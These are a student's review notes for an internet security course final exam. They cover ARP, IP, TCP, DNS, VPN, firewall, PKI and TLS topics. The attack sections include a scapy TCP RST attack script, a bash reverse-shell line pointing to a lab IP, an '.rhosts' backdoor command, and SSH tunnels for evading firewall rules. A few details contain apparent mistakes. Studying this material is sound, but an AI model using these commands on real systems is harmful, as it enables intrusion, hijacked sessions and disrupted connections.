CSE-644: Internet Security (Final Review)

04 May 2020

Exam date/time (Spring 2020)
Sniff/spoof
ARP: Address Resolution Protocol
IP: Internet Protocol
TCP: Transmission Control Protocol
DNS: Domain Name System
VPN: Virtual Private Network
Linux Firewall
PKI (Public Key Infrastructure)
TLS: Transport Layer Security
Secret-key Encryption
One-way Hash Function
BGP: Border Gateway Protocol

Exam date/time (Spring 2020)

May 05, 3-5 PM (online exam due to coronavirus!)

Sniff/spoof

Promiscuous mode: NIC passes every frame to the kernel. Usually frames that have matching MAC address are passed to the kernel. Other packets will be dropped by hardware.
Monitor mode: the “promiscuous mode” for wireless NICs. Because wireless transmission works on different channels, this requires special hardware. Sometimes it is impossible to capture all traffic in the physical world.
BSD Packet Filter (BPF)
- A filtering mechanism implemented inside the kernel.
- We need to implement this filter in kernel space because it is costly to pass them from kernel to user space.
- BPF Syntax
Packet sniffing/spoofing
- Sniff: raw socket, pcap, scapy
- Spoof: raw socket, scapy
Endianness
- Big endian: most significant byte first (e.g. Network, IBM PowerPC)
- Small endian: least significant byte first (e.g. x86, Qualcomm Hexagon)

ARP: Address Resolution Protocol

arp

Purpose of ARP protocol: find the corresponding MAC address of an IP address inside a local network.
Three ways to conduct ARP cache poisoning
- Identities: M (attacker), A (victim), B
- Goal: on machine A, B’s IP address is associated with M’s MAC address.
- Using ARP request
  - Spoof a tampered request on behalf of B to A (as if B is requesting A’s MAC address)
  - ARP request
```
OPER=1
SHA=M's MAC
SPA=B's IP
TPA=A's IP
```
- Using ARP reply
  - ARP reply (as if B is replying A’s ARP request)
```
OPER=2
SHA=M's MAC
SPA=B's IP
THA=A's MAC
TPA=A's IP
```
- Using ARP gratuitous message
  - Gratuitous message: a broadcast ARP message informing address changes to the entire network.
  - Characteristics: OPER=1, SPA=TPA, THA=BROADCAST
  - ARP packet
```
OPER=1
SHA=M's MAC
SPA=B's IP
THA=BROADCAST
TPA=B's IP
```
We cannot use ARP to attack remote computers because ARP packets will not be routed on the Internet.

IP: Internet Protocol

ipv4-hdr

IP Header
- Version: 4
- Internet Header Length (IHL): length of the IP header, counted in 4 bytes. Minimum is 5 (the minimal IP header size is 20).
- Total length: the length of the entire packet, including header and data. Since it has 16 bits, the maximum size of an IP packet is $2^{16} - 1 = 65535$ bytes.
- Identification: To identify the group of fragments of a single IP datagram.
- Flags:
  - Bit 0: Reserved, must be zero
  - Bit 1: Don’t fragment (DF) - can be used for path MTU discovery
  - Bit 2: More fragments (MF)
- Fragment offset: the offset of this packet’s data counted in 8 bytes.
- Time to live: helps prevent IP datagram for persisting on an Internet by limiting a packet’s life time.
- Protocol: specifies the protocol of the payload.
IP Address
- CIDR Notation
  - 192.168.100.14/24 represents the IPv4 address 192.168.100.14 and its associated routing prefix 192.168.100.0, or equivalently, its subnet mask 255.255.255.0, which has 24 leading 1-bits.
  - the IPv4 block 192.168.100.0/22 represents the 1024 IPv4 addresses from 192.168.100.0 to 192.168.103.255.
  - 192.168.100.0/24 is equivalent to 192.168.100.0/255.255.255.0.

IP fragmentation

The fragmented packets will have the same ID.
All packets except the last one will have MF flag set.

Sample fragmented IP traffic

Total size of IP payload: UDPHDR(8) + PAYLOAD(10000)=10008
The length of each packet: ETHERHDR(14) + IP
Therefore, each packet of length 1514 contains 1500 bytes of IP data, which means 1480 bytes of payload. The packet of length 1162 contains $1162-14-20=1128$ bytes of payload. The total size of payload is $1480 \times 6 + 1128 = 10008$.

No.	Source	Destination	Protocol	Length	Info
5	192.168.0.100	192.168.0.1	IPv4	1514	“Fragmented IP protocol (proto=UDP 17, off=0, ID=0001) [Reassembled in #11]”
6	192.168.0.100	192.168.0.1	IPv4	1514	“Fragmented IP protocol (proto=UDP 17, off=1480, ID=0001) [Reassembled in #11]”
7	192.168.0.100	192.168.0.1	IPv4	1514	“Fragmented IP protocol (proto=UDP 17, off=2960, ID=0001) [Reassembled in #11]”
8	192.168.0.100	192.168.0.1	IPv4	1514	“Fragmented IP protocol (proto=UDP 17, off=4440, ID=0001) [Reassembled in #11]”
9	192.168.0.100	192.168.0.1	IPv4	1514	“Fragmented IP protocol (proto=UDP 17, off=5920, ID=0001) [Reassembled in #11]”
10	192.168.0.100	192.168.0.1	IPv4	1514	“Fragmented IP protocol (proto=UDP 17, off=7400, ID=0001) [Reassembled in #11]”
11	192.168.0.100	192.168.0.1	UDP	1162	50000 -> 50000 Len=10000

DOS attack with IP fragmentation: send a lot of packets with MF flag set and different ID to try to stall the victim’s memory. Unfortunately, this problem has been fixed and it is not working.
ICMP redirect attack
- An ICMP redirect is an error message sent by a router to the sender of an IP packet. Redirects are used when a router believes a packet is being routed sub optimally and it would like to inform the sending host that it should forward subsequent packets to that same destination through a different gateway.
- By default, Linux do not process redirect packets. To activate it, one needs to call:
```
[02/09/20]seed@vm2:~$ sudo sysctl net.ipv4.conf.all.accept_redirects=1
net.ipv4.conf.all.accept_redirects = 1
```
- The construction of an ICMP redirect attack packet
  - We spoof a fake ICMP message on behalf of the router of the network to the victim, informing him that packets sending to 10.0.0.1 should be routed to 10.0.2.5.
```
from scapy.all import *
ip1 = IP(src='10.0.2.1', dst='10.0.2.6')
icmp = ICMP(type=5, code=1,gw='10.0.2.5')
ip2 = IP(src='10.0.2.6', dst='10.0.0.1')
udp = UDP(dport=9090)
packet = ip1/icmp/ip2/udp
send(packet)
```
- If the destination IP is a local machine, this may not work because those packets will not be routed.
UDP: User Datagram Protocol
- UDP chekcsum is not always verified

TCP: Transmission Control Protocol

tcphdr

TCP Header
- Data offset: helps compute the offset of the start of actual data. This is counted in four bytes. The minimal size of TCP header is 20, so the minimum value of this field is 5.
- Flags
  - SYN: synchronize sequence numbers. This is during three-way handshake.
  - ACK: indicates the ACK field is significant. This should be set after the handshake.
  - RST: reset the connection. Basically, terminates the connection immediately.
- Window size: the size of receive window. This field is used for flow control.
- Urgent pointer: if the urgent flag is set, this marks the offset from sequence number the last byte of urgent data. Usually, urgent data has special handlers.
TCP Checksum computation

To compute TCP checksum, we need to construct a packet with pseudo-header and TCP header+data.
- The segment length is the total length of TCP header and payload.
- The original TCP header and payload is appended after this pseudo-header. Note that the checksum field in the TCP header should be initialized with zero!
The checksum is the IP checksum of the concatenated result. After computing checksum, fill the value back to the TCP header.

Sample TCP traffic

No.	Source	Destination	Protocol	Length	Info
58	192.168.0.111	192.168.0.100	TCP	78	65117 > 9090 [SYN] Seq=0 Win=65535 Len=0
59	192.168.0.100	192.168.0.111	TCP	74	“9090 > 65117 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0”
60	192.168.0.111	192.168.0.100	TCP	66	65117 > 9090 [ACK] Seq=1 Ack=1 Win=131712 Len=0
93	192.168.0.111	192.168.0.100	TCP	87	“65117 > 9090 [PSH, ACK] Seq=1 Ack=1 Win=131712 Len=21 “
94	192.168.0.100	192.168.0.111	TCP	66	9090 > 65117 [ACK] Seq=1 Ack=22 Win=65152 Len=0
138	192.168.0.100	192.168.0.111	TCP	101	“9090 > 65117 [PSH, ACK] Seq=1 Ack=22 Win=65152 Len=35 “
139	192.168.0.111	192.168.0.100	TCP	66	65117 > 9090 [ACK] Seq=22 Ack=36 Win=131712 Len=0
145	192.168.0.111	192.168.0.100	TCP	77	“65117 > 9090 [PSH, ACK] Seq=22 Ack=36 Win=131712 Len=11 “
146	192.168.0.100	192.168.0.111	TCP	66	9090 > 65117 [ACK] Seq=36 Ack=33 Win=65152 Len=0
150	192.168.0.111	192.168.0.100	TCP	66	“65117 > 9090 [FIN, ACK] Seq=33 Ack=36 Win=131712 Len=0 “
151	192.168.0.111	192.168.0.100	TCP	60	“65117 > 9090 [RST, ACK] Seq=34 Ack=36 Win=131712 Len=0”

SEQ and ACK numbers
- Suppose A is sending a packet to B. Think of SEQ number as a pointer to the last unsent byte on A, think of the ACK number as a pointer to the next expected byte from B. For example, when A sends a packet with SEQ=0, LEN=10, we know that the ACK from B will be 10. From A, we have sent buf[0] to buf[9], which are all unsent. And B is expecting buf[10].
- Sample traffic
```
(Packet 1: A -> B) SEQ=x1      ACK=y1       LEN=z1
(Packet 2: B -> A) SEQ=y1      ACK=x1+z1    LEN=0   (ACK Packet)
(Packet 3: B -> A) SEQ=y1      ACK=x1+z1    LEN=z2
(Packet 4: A -> B) SEQ=x1+z1   ACK=y1+z2    LEN=0   (ACK Packet)
```
Three-way handshake: how a TCP connection starts
- Client sends SYN packet with initial SEQ
- Server responds with SYN+ACK packet with initial SEQ and incremented ACK number.
- Client responds incremented ACK .
- Despite message length being zero, the ACK number is incremented by one!
```
(Packet 1: A -> B) SEQ=x1                   LEN=0  (SYN)
(Packet 2: B -> A) SEQ=y1      ACK=x1+1     LEN=0  (SYN+ACK)
(Packet 3: B -> A) SEQ=x1+1    ACK=y1+1     LEN=0  (ACK)
```
SYN Flooding Attack
- Each server has a connection queue to manage connections. SYN flooding is to spoof a large amount of SYN packets to the server, which fills the server’s connection queue with malicious connections. If the connection queue is full, the server will no longer be able to start new connections.
- Countermeasure: SYN Cookie
  - When the connection queue is filled, the server will encode some information about the connection (e.g. time, client’s IP, port number) into the sequence number field and send reply to the client. Then, the connection is not stored anymore, which prevents the DOS attack.
  - If the packet is from a malicious attacker, he will not receive this packet back (because the source IP address is not his!)
  - If the client is indeed interested in talking to the server, it will send a ACK packet back to the server. The server checks this packet and see if it has the correct ACK number, which is encoded with the client’s information. If so, the connection is established.

TCP RST Attack

Local attack: sniff the TCP packets on LAN and spoof RST packets with correct SEQ and ACK numbers.
Remote attack: spoof RST packets with random SEQ and ACK numbers.

Python attack code

from scapy.all import *

def rst_attack(pkt):
    if 'R' in pkt[TCP].flags:
        return

    baseSeq = pkt[TCP].ack
    baseAck = pkt[TCP].seq
    ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    tcp = TCP(sport=pkt[TCP].dport,
                 dport=pkt[TCP].sport,
                 flags='AR',
                 seq=baseSeq,
                 ack=baseAck+1)
    outPacket = ip/tcp

    send(outPacket)

sniff(filter='dst host 10.0.2.7 and tcp portrange 23-23', prn=rst_attack)

Switch src IP and dst IP
Flags=AR
Fill the correct SEQ and ACK numbers

TCP Session Hijacking
- Sample attack
  - The wireshark capture of the last packet
```
17  10.0.2.6 10.0.2.7 TCP 66 58520 → 23 [ACK] Seq=1911510874 Ack=145612526 Win=237 Len=0
```
  - Spoof a packet
    SRC IP=10.0.2.7 DST IP=10.0.2.6 SEQ=145612526 ACK=1911510874
- It is better to target ACK packets with LEN=0! In this case, we don’t need to compete with the actual sender on the network.
- Why does the telnet session freeze?
  
  If you hijack the session by spoofing a packet from A to B, machine B will be expecting a new ACK number. However, all message from B to A will be dropped by A because A will consider the ACK number invalid. Therefore, A does not know the new ACK number. All message from A to B will be dropped because the SEQ number is invalid.
- Setting up a reverse shell
```
/bin/bash -i > /dev/tcp/10.0.2.5/9090 0<&1 2>&1
```
  - > /dev/tcp/10.0.2.5/9090 redirects stdout (file descriptor 1) to a TCP port.
  - 0<&1 redirects stdin (file descriptor 0) to stdout.
  - 2>&1 redirects stderr (file descriptor 2) to stdout.
  - & means file descriptor reference.
Mitnick attack
- Background: there is a protected machine “X-Terminal” and a trusted server. The remote shell program is the legacy rsh, which you can set a IP-address based authentication to allow automatic login for a certain IP address. It is stored in a file named .rhosts. In this case, the IP address of the trusted server is added into this file, which means the trusted server can login to X-Terminal without any authentication. Our goal is to set up a backdoor on X-Terminal so that we can also login to X-Terminal without authentication.
- The attack
  1. SYN flood the trusted server
    
    We need to conduct a DOS attack on the trusted server first. In the lab scenario, we simply disconnect the trusted server. However, since the trusted server should still be able to respond ARP requests because we only attack the TCP queue, we should add a static ARP entry for the trusted server on the X-Terminal.
  2. Spoof a SYN packet on behalf of the trusted server to X-Terminal
    
    In this step, we try to establish a connection to the X-Terminal.
  3. Spoof a ACK packet to X-Terminal
    
    After step 2, the X-Terminal will send a SYN+ACK message. However, since the source IP address is trusted server’s, we will not be able to receive the packet. Fortunately, the trusted server has been blocked and will not respond either. This grants us time to hijack the connection. To spoof a correct ACK packet, we need to know the ACK number in X-Terminal’s SYN+ACK response. In reality, Mitnick acquired the pattern of ACK numbers on the X-server.
  4. Spoof a command to install the backdoor
    
    Because the IP of trusted server has already been put in .rhosts, we are able to send and execute commands on the X-Terminal without any further authentication. We simply just add our IP address into .rhosts and the attack is done. In reality, we can do echo ++ >> .rhosts to allow arbitrary IP address. This will hide attacker’s identity.

DNS: Domain Name System

dnshdr

DNS server listens to UDP port 53
The hierarchical structure of DNS
- Root domain -> top level domains -> second-level domains
- A DNS query goes step by step from higher levels to lower levels, until a definitive answer is found.
- DNS hierarchy are separated into different zones, where each zone is a configuration subspace of DNS domain names.
DNS Header
- A complete DNS packet: IPHDR+UDPHDR+DNSHDR
- QDCOUNT: number of question records
- QNCOUNT: number of answer records
- NSCOUNT: number of authority records
- ARCOUNT: number of additional records
- QR flag: specifies if the packet is a query (0) or response (1)
- AA flag: specifies if the answer is authoritative or not. If the answer is authoritative, it comes from a name server that can provide a definitive and authoritative answer for domain name in question section. For example, if I query www.google.com from a.gtlb-servers.net, the response will not have AA flag because the domain name is not managed by this server. However, if I query www.google.com from one of Google’s name servers (e.g. ns1.google.com), the answer will have AA flag.
- RD flag: specifies if recursion is desired. If the query is recursive, the DNS server will iteratively search for the final answer to a DNS query. Whether this is available or not depends on the DNS server’s configuration.

DNS Records

There are three types of DNS records: question record, answer record and authority record.

Sample dig result (query www.google.com from root servers)

Record type: NS (authority), A (IP address)
172800: TTL in terms of seconds. Specifies how long this record should exist in DNS cache.

; <<>> DiG 9.11.3-1ubuntu1.11-Ubuntu <<>> www.google.com @a.root-servers.net -4
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63490
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 13, ADDITIONAL: 27
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1472
;; QUESTION SECTION:
;www.google.com.			IN	A

;; AUTHORITY SECTION:
com.			172800	IN	NS	a.gtld-servers.net.
com.			172800	IN	NS	b.gtld-servers.net.
com.			172800	IN	NS	c.gtld-servers.net.
com.			172800	IN	NS	d.gtld-servers.net.
com.			172800	IN	NS	e.gtld-servers.net.
com.			172800	IN	NS	f.gtld-servers.net.
com.			172800	IN	NS	g.gtld-servers.net.
com.			172800	IN	NS	h.gtld-servers.net.
com.			172800	IN	NS	i.gtld-servers.net.
com.			172800	IN	NS	j.gtld-servers.net.
com.			172800	IN	NS	k.gtld-servers.net.
com.			172800	IN	NS	l.gtld-servers.net.
com.			172800	IN	NS	m.gtld-servers.net.

;; ADDITIONAL SECTION:
a.gtld-servers.net.	172800	IN	A	192.5.6.30
b.gtld-servers.net.	172800	IN	A	192.33.14.30
c.gtld-servers.net.	172800	IN	A	192.26.92.30
d.gtld-servers.net.	172800	IN	A	192.31.80.30
e.gtld-servers.net.	172800	IN	A	192.12.94.30
f.gtld-servers.net.	172800	IN	A	192.35.51.30
g.gtld-servers.net.	172800	IN	A	192.42.93.30
h.gtld-servers.net.	172800	IN	A	192.54.112.30
i.gtld-servers.net.	172800	IN	A	192.43.172.30
j.gtld-servers.net.	172800	IN	A	192.48.79.30
k.gtld-servers.net.	172800	IN	A	192.52.178.30
l.gtld-servers.net.	172800	IN	A	192.41.162.30
m.gtld-servers.net.	172800	IN	A	192.55.83.30

;; Query time: 26 msec
;; SERVER: 198.41.0.4#53(198.41.0.4)
;; WHEN: Sat May 02 18:14:53 EDT 2020
;; MSG SIZE  rcvd: 839

Local DNS attack
- Providing a authoritative answer for a specific domain
  
  In the lab scenario, we would like to specify an authoritative domain name server for a certain domain. Normally, we need to purchase a domain to do so. However, there is a way to avoid the cost. Suppose there are three machines A (User), B (Local DNS Server) and C (Authoritative Name Server). The following configuration allows A to view C as the domain name’s authoritative name server.
  1. On machine A, set the DNS server to be B.
  2. On machine B, use a “forward” record inside BIND9 zone file to forward the DNS requests of a specific zone to C.
  3. Set up an authoritative zone on C’s BIND9 zone file.
- The attack
  1. The attacker sniffs DNS requests from A.
  2. Upon receiving a DNS request, the attacker construct a DNS reply. He changes the authority section of the domain name to his own DNS server and then spoof the packet back.
- We choose to change the authority section because any further DNS query on this domain will go to the attacker’s DNS server.
Remote DNS attack (Kaminsky attack)
- Challenges
  - We do not know when the victim will send out DNS query.
  - If the reply is cached by the victim, it will take a long time before the attacker can try again.
  - We do not know the DNS transaction number and UDP source port.
- The attack
  1. The attacker queries the victim for a random name in example.com (e.g. abcdef.example.com). Because the victim does not have the answer for this domain name, it will send out a DNS query.
  2. While the victim is waiting for reply, the attacker spoof DNS replies with random transaction number and UDP destination port number. The authority section is replaced by the attacker’s DNS server, the answer section contains a IP resolution for the random domain name. If one of the packets have the correct combination, the attack will be successful, and the name server for example.com will become the attacker’s name server.
  3. If the DNS response fail, the attacker repeats from step 1. Because the new random name is not in victim’s DNS cache, the victim will send new DNS queries.
DNS Rebinding attack
- Background: the attack is used to defeat the Same Origin Policy (SOP) of web browsers. Suppose there are two machines A, B behind a firewall, and A is invisible from outside. Suppose B’s user browse attacker’s website, the attacker normally does not have access of A, because the SOP only allows AJAX code to interact with the website’s domain. The DNS rebinding attack works by rebinding the IP address of attacker’s domain to A’s IP address. When the AJAX code trigger requests, it actually talks to machine A. This allows the attacker to manipulate the invisible machine behind a firewall.
- The attack
  1. At the beginning, the attacker’s domain name is mapped to its real IP address. The TTL of DNS response is set to be very small (e.g. 2 seconds) for the rebinding attack to work
  2. The user of machine B browse the attacker’s website. The malicious JavaScript code begins to run on B.
  3. After a while, the AJAX code on the page sends a request to attacker’s website. Because the DNS cache has already expired, B will query the IP address again from attacker’s name server. The answer of attacker’s name server now is A’s IP address. Therefore, the request is sent to A.
Countermeasure
- DNSSEC: protect DNS queries with digital signatures.
Amplification attack

One can spoof DNS queries (which are small) with the victim’s source IP. This will trigger a large amount of DNS responses (which are large) to the victim.

VPN: Virtual Private Network

vpn

This is the architecture of a TUN/TAP based VPN. The mechanism of some IPsec based VPN is a little bit different.
TUN/TAP Interface: they serve as a way to extract packets from the kernel space. TUN/TAP interfaces have two ends: the network end and file system end. In the routing table, we can route packets to the network end of TUN/TAP interface. Then, the user program can read packets out from TUN/TAP’s file system end.
How VPN works

Suppose there are three computers A (VPN user), B (VPN server) and C (machine behind firewall).
- A’s IP: 10.0.2.5
- B’s IP: 10.0.2.6, 192.168.60.1 (two NICs)
- C’s IP: 192.168.60.101
1. A TUN interface is created on A with IP address 192.168.50.5. The 192.168.50.0/24 subnet is reserved for TUN interfaces. In A’s routing table, all traffic that goes to 192.168.50.0/24 is routed to tun0 (usually this is set automatically when you assign IP address to a TUN interface). All traffic that goes to 192.168.0.60/24 is routed to tun0 as well.
2. A VPN program on A reads packets out from tun0 and send them to the VPN server via the Internet. (The src IP of packets coming out from tun0 is 192.168.50.5, because they are routed and emitted by tun0.)
3. The VPN server program on B receives the packet. On B, it also has a TUN interface called tun1 with IP address 192.168.50.1. The VPN program will write packets into tun1. The OS will route packets to the NIC with IP address 192.168.60.1, and C will receive the packet.
4. For packets to come back, on C, the 192.168.50.0/24 subnet is routed to 192.168.60.1.
- Corresponding VPN setup script
  - Machine A
    sudo ifconfig tun0 192.168.50.5/24 up sudo route add -net 192.168.60.0/24 tun0
  - Machine B Remember to turn on IP forwarding!
    sudo ifconfig tun1 192.168.50.1/24 up sudo sysctl net.ipv4.ip_forward=1
  - Machine C
    sudo route add -net 192.168.50.0/24 gw 192.168.60.1
Maintaining packet boundary

When packets are sent from A to B, if we are using UDP, the read system call will read the number of bytes of UDP payload, and the packet boundary is automatically maintained. However, if we are using TCP, the number of bytes read by the system call is undermined: it could be less than, equal to or larger than the actual packet size. Therefore, special measure needs to be taken to maintain packet boundary when the protocol between A and B is TCP. For example, we can prepend a header that contains packet size before each packet.

Linux Firewall

Three types of firewall
- Packet filter (stateless)
- Stateful firewall (able to monitor connections and other persistent information)
- Application/proxy firewall

The netfilter interface in Linux

The netfilter interface provided by Linux kernel allows one to insert high-performance firewall modules into Linux kernel.

The Makefile to compile kernel modules (assume the kernel module is kmod.c)

obj-m+=kmod.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

Operations of netfilter
- NF_ACCEPT: let the packet flow through the stack
- NF_DROP: discard the packet
- NF_QUEUE: put the packet to the user space via nf_queue facility.
- NF_STOLEN: inform netfilter framework to forget the packet. The further processing of this packet is passed on to the custom firewall module.
- NF_REPEAT: reqeust netfilter to call this module again.
netfilter hooks
- SNAT is performed at POST_ROUTING

Sample firewall module based on netfilter

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/ip.h>
#include <linux/tcp.h>

static struct nf_hook_ops telnetFilterHook;

unsigned int telnetFilter(void *priv, struct sk_buff *skb,
                 const struct nf_hook_state *state)
{
  struct iphdr *iph;
  struct tcphdr *tcph;

  iph = ip_hdr(skb);
  tcph = (void *)iph+iph->ihl*4;

  if (iph->protocol == IPPROTO_TCP && tcph->dest == htons(23)) {
    return NF_DROP;
  } else {
    return NF_ACCEPT;
  }
}

int setUpFilter(void) {
        telnetFilterHook.hook = telnetFilter;
        telnetFilterHook.hooknum = NF_INET_POST_ROUTING;
        telnetFilterHook.pf = PF_INET;
        telnetFilterHook.priority = NF_IP_PRI_FIRST;

        // Register the hook.
        nf_register_hook(&telnetFilterHook);
        return 0;
}

void removeFilter(void) {
        nf_unregister_hook(&telnetFilterHook);
}

module_init(setUpFilter);
module_exit(removeFilter);

MODULE_LICENSE("GPL");

iptables firewall

iptables is a frontend of netfilter which provides a lot of powerful functionalities.
The packet traversal graph of iptables

iptables Tables and Chains

Table	Chain	Functionality
filter	INPUT FORWARD OUTPUT	Packet filtering
nat	PREROUTING INPUT OUTPUT POSTROUTING	Modifying src/dst network address.
mangle	PREROUTING INPUT FORWARD OUTPUT POSTROUTING	Packet content modification.

Examples

Assume A’s IP is 10.0.2.5; B’s IP is 10.0.2.6.

Incrementing all incoming packets’ TTL by 5

 sudo iptables -t mangle -A PREROUTING -j TTL --ttl-inc 5

Prevent A from doing telnet to B

 sudo iptables -t filter -A OUTPUT -p tcp --dport 23 -d 10.0.2.6 -j DROP

Prevent A from receiving telnet requests from B

 sudo iptables -t filter -A INPUT -p tcp --dport 23 -s 10.0.2.6 -j DROP

Prevent A from visiting an external website Assume the IP address of the website is 157.240.18.35.

sudo iptables -t filter -A OUTPUT -p tcp -m multiport --dports 80,443 -d 157.240.18.35 -j DROP

Evading packet filtering
- Evading egress filtering
  
  Suppose rule 2 in the previous bullet point is active. We can ssh into machine B and forward port 23 to something else.
```
ssh -L 8000:localhost:23 seed@10.0.2.6
```
  Now, we can telnet to localhost’s port 8000 in order to telnet to machine B.
```
telnet localhost 8000
```
- Browsing another website
  
  Suppose rule 4 in the previous bullet point is active. In order to browse the website, we can ssh to machine B with dynamic port forwarding.
```
ssh -D 8000 -C seed@10.0.2.6
```
  In order to browse the blocked website, we can setup a SOCKS proxy in Firefox at 127.0.0.1:8000.
- Evading ingress filtering Suppose rule 3 in the previous bullet point is active. From machine A, we can ssh to machine B with remote port forwarding:
```
ssh -R 8000:localhost:23 seed@10.0.2.6
```
  Now, on machine B, the user can telnet to his own 127.0.0.1:8000, and it will eventually reach machine A.
Connection based rules

Suppose we want to limit the number of TCP connections from a specific IP address. We can run:
```
sudo iptables -A INPUT -p tcp --syn --dport 80 -s 10.0.2.5 -m connlimit --connlimit-above 1 --connlimit-mask 32 -j REJECT --reject-with-tcp-reset
```
This limits the amount of connections from 10.0.2.5 to 1.

NAT: Network Address Translation

NAT is used to mitigate the lack of IPv4 address.
DNAT (Destination NAT): used to publish a service located inside a private network. It’s called DNAT because the router effectively changes the destination IP address of arrived packets (to the mapped machine’s address). DNAT is also called port forwarding.
SNAT (Source NAT): used to allow machines inside a private network to talk with outside servers. It’s called SNAT because the router effectively changes the source IP address of arrived packets (to its own address).

SNAT Example

Role	VM IP
A	10.0.2.5
G (Gateway)	10.0.2.6, 192.168.60.1
B	192.168.60.101

Without SNAT, B cannot reach A. To set up a SNAT, on G, we run:

sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o enp0s3 -j SNAT --to-source 10.0.2.6

Basically, the source address will be changed to 10.0.2.6. On the gateway, a specific port is associated with machine A so that when the packet comes back, it will be forwarded to A instead of other machines.

DNAT Example

Suppose I want to telnet from A to B. Without DNAT, A cannot reach B. We can set up a DNAT to forward B’s port 23 to G’s port 8000:

sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -j DNAT --to-destination 192.168.60.101:23

Load balancing with DNAT

Another purpose of DNAT is to achieve load balancing, because a port on G can be mapped to multiple destinations. For example, we can set up a hypothetical load balancing application that forwards packets to different ports of B:
```
sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -m statistic --mode random --probability .50 -j DNAT --to-destination 192.168.60.101:9000
sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -m statistic --mode random --probability 1.0 -j DNAT --to-destination 192.168.60.101:9001
```
The second rule has probability 1.0 because the actual probability is the product of the current probability and probabilities left (unassigned). Therefore, each rule has a 50% chance.

PKI (Public Key Infrastructure)

Public-key cryptography

Briefly speaking, public-key cryptographic algorithms have a public key p and private key e. Anyone can encrypt data with p, but only the holder of e can decrypt. Conversely, the holder of e can encrypt a message with e, and anyone that has p can decrypt the message. This implies that:
- Encryption and decryption are one-way: without corresponding keys, given ciphertext, it is difficult to get the plaintext; given plaintext, it is difficult to get the ciphertext.
- Anyone can transfer information to the holder of e securely. Only the holder of e can decrypt the message.
- The holder of e can prove a message is indeed sent from him by sending the message and another version of the message encrypted with e. The receiver can verify the author by comparing the decrypted message and the actual message. (This is known as digital signature.)
Diffie-Hellman key exchange

DH allows two parties to exchange a secret key securely. Suppose there are two sides A and B, then:
1. A and B agrees on a big positive prime $g$ and a smaller positive prime $p$.
2. A picks a random positive integer $x < p$ and sends $g^x\mathbin{\mathrm{mod}}p$ to B.
3. B picks a random positive integer $y < p$ and sends $g^y\mathbin{\mathrm{mod}}p$ to A.
4. Both A and B can compute the shared secret by calculating $K=g^{xy}\mathbin{\mathrm{mod}}p$.
An outsider will not be able to get $K$ because he does not know $x$ or $y$.
Man-In-The-Middle (MITM) Attack

Despite the fact that the combination of public-key cryptography and DH seems to be secure, it is susceptible to MITM attacks. That is to say, an attacker C can talk with A and B at the same time, tricking each party into thinking that C is the other side. In this way, C can steal the secret. The PKI is intended to defeat MITM attack.
- An example A and B were to talk directly. However, M can intercept their traffic, which makes the connections looks like A⟷M⟷B.
  1. M intercepts the public key sent from A to B. Now he sends his own public key to B.
  2. When B wants to send something to A, B will encrypt the message with M’s public key.
  3. M can decrypt the message and encrypt it again with A’s public key.
  4. M send the message to A.
  Both parties will not be able to spot M, and their traffic is completely compromised.
How PKI defeats MITM attack
- Two key components in PKI
  - Digital Certificates: It is a document that proves the owner ship of the public key mentioned in the certificate. Digital certificates are signed by CAs who certify the owner ship of their contained public keys.
  - Certificate Authority (CA): they are responsible for verifying the identity of users and providing them with signed digital certificates.
- The certificates (public keys) of CAs are already installed in operating systems and browsers. This is the root of trust.
- If the attacker…
  - Creates a fake certificate: the certificate cannot be signed by a trusted CA. Therefore, it will not be accepted by browsers.
  - Forwards the real certificate: the validation will pass in browser. However, the session key will be encrypted with the real certificate’s public key afterwards. The attacker will be unable to get the session key, and the actual traffic stays encrypted.
  - Uses his own certificate: the common name of this own certificate will differ from the attacked website. Therefore, it will not be accepted by browsers.

How to create a self-signed CA and issue certificates

Generate public/private key pairs for the CA

openssl req -x509 -newkey ras:4096 -sha256 -keyout key.pem -out cert.pem

Generate public/private key pairs for a server

openssl genrsa -aes128 -out server_key.pem 2048

Generate certificate signing request

openssl req -new -key server_key.pem -out server.csr -sha256

Sign the certificate on CA side

openssl ca -in server.csr -out server_cert.pem -md sha256 -cert cert.pem -keyfile key.pem

Deploy the certificate on the server side Put the private key into the certificate

cp server_key.pem server_deploy.pem
cat server_cert.pem >> server_deploy.pem

Test the certificate with openssl test server

openssl s_server -cert server_deploy.pem -accept 4433 -www

TLS: Transport Layer Security

The goal of TLS is to guarantee:
- Confidentiality: no other parties can see the actual content of communication.
- Integrity: if data are tampered by others, the channel should be able to detect.
- Authentication: at least one end of the channel should be verified.

TLS Programming

Sample client

#include <arpa/inet.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <netdb.h>


#define CHK_SSL(err) if ((err) < 1) { ERR_print_errors_fp(stderr); exit(2); }
#define CA_DIR "ca_client"

int verify_callback(int preverify_ok, X509_STORE_CTX *x509_ctx)
{
    char  buf[300];

    X509* cert = X509_STORE_CTX_get_current_cert(x509_ctx);
    X509_NAME_oneline(X509_get_subject_name(cert), buf, 300);
    printf("subject= %s\n", buf);

    if (preverify_ok == 1) {
       printf("Verification passed.\n");
    } else {
       int err = X509_STORE_CTX_get_error(x509_ctx);
       printf("Verification failed: %s.\n",
                    X509_verify_cert_error_string(err));
    }

    return preverify_ok;
}

SSL* setupTLSClient(const char* hostname)
{
    // Step 0: OpenSSL library initialization
   // This step is no longer needed as of version 1.1.0.
   SSL_library_init();
   SSL_load_error_strings();
   SSLeay_add_ssl_algorithms();

   SSL_METHOD *meth;
   SSL_CTX* ctx;
   SSL* ssl;

   meth = (SSL_METHOD *)TLSv1_2_method();
   ctx = SSL_CTX_new(meth);

   SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
   if(SSL_CTX_load_verify_locations(ctx,NULL, CA_DIR) < 1){
	printf("Error setting the verify locations. \n");
